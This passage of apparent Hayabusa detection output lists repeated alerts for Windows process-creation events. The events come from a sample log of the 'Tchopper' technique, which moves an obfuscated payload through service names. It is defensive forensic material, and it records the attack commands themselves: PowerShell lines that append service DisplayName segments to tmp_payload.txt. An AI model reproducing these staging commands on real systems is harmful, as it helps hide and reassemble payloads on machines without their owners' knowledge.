0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | 
User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:01.284 